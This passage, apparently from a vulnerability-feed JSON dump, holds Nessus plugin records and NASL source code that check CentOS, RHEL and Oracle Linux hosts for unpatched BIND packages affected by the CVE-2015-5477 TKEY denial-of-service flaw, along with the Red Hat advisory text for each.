(\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-devel-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-libs-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", 
reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-libs-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-libs-lite-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-license-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-lite-devel-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:12", "description": "Updated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. 
BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "RHEL 5 : bind (RHSA-2015:1514)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind", "p-cpe:/a:redhat:enterprise_linux:bind-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libbind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libs", "p-cpe:/a:redhat:enterprise_linux:bind-sdb", "p-cpe:/a:redhat:enterprise_linux:bind-utils", "p-cpe:/a:redhat:enterprise_linux:caching-nameserver", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2015-1514.NASL", "href": "https://www.tenable.com/plugins/nessus/85069", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1514. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85069);\n script_version(\"2.14\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1514\");\n\n script_name(english:\"RHEL 5 : bind (RHSA-2015:1514)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1514\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:caching-nameserver\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1514\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\n if 
(rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-chroot-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-debuginfo-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-libbind-devel-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"bind-libs-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-sdb-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"bind-utils-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"caching-nameserver-9.3.6-25.P1.el5_11.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + 
redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:15", "description": "Updated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-29T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : bind (RHSA-2015:1513)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:bind", "p-cpe:/a:redhat:enterprise_linux:bind-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bind-devel", "p-cpe:/a:redhat:enterprise_linux:bind-libs", "p-cpe:/a:redhat:enterprise_linux:bind-libs-lite", "p-cpe:/a:redhat:enterprise_linux:bind-license", "p-cpe:/a:redhat:enterprise_linux:bind-lite-devel", "p-cpe:/a:redhat:enterprise_linux:bind-sdb", "p-cpe:/a:redhat:enterprise_linux:bind-sdb-chroot", "p-cpe:/a:redhat:enterprise_linux:bind-utils", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.7", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.1", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-1513.NASL", "href": "https://www.tenable.com/plugins/nessus/85068", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1513. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85068);\n script_version(\"2.19\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-5477\");\n script_xref(name:\"RHSA\", value:\"2015:1513\");\n\n script_name(english:\"RHEL 6 / 7 : bind (RHSA-2015:1513)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated bind packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the\nDomain Name System (DNS) protocols. BIND includes a DNS server\n(named); a resolver library (routines for applications to use when\ninterfacing with DNS); and tools for verifying that the DNS server is\noperating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS\nresource records. A remote attacker could use this flaw to make named\n(functioning as an authoritative DNS server or a DNS resolver) exit\nunexpectedly with an assertion failure via a specially crafted DNS\nrequest packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1513\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5477\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-libs-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-license\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-lite-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-sdb-chroot\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1513\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", 
reference:\"bind-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bind-chroot-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"bind-debuginfo-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"bind-devel-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"bind-libs-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bind-sdb-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bind-utils-9.8.2-0.37.rc1.el6_7.2\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-debuginfo-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-devel-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-libs-9.9.4-18.el7_1.3\")) 
flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-libs-lite-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-license-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"bind-lite-devel-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-sdb-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-sdb-chroot-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"bind-utils-9.9.4-18.el7_1.3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chroot / bind-debuginfo / bind-devel / bind-libs / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:03:17", "description": "From Red Hat Security Advisory 2015:1514 :\n\nUpdated bind packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. 
BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource records. A remote attacker could use this flaw to make named (functioning as an authoritative DNS server or a DNS resolver) exit unexpectedly with an assertion failure via a specially crafted DNS request packet. (CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream acknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. After installing the update, the BIND daemon (named) will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2015-07-30T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : bind (ELSA-2015-1514)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bind", "p-cpe:/a:oracle:linux:bind-chroot", "p-cpe:/a:oracle:linux:bind-devel", "p-cpe:/a:oracle:linux:bind-libbind-devel", "p-cpe:/a:oracle:linux:bind-libs", "p-cpe:/a:oracle:linux:bind-sdb", "p-cpe:/a:oracle:linux:bind-utils", "p-cpe:/a:oracle:linux:caching-nameserver", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2015-1514.NASL", "href": "https://www.tenable.com/plugins/nessus/85116", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:1514 and \n# Oracle Linux Security Advisory ELSA-2015-1514 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85116);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
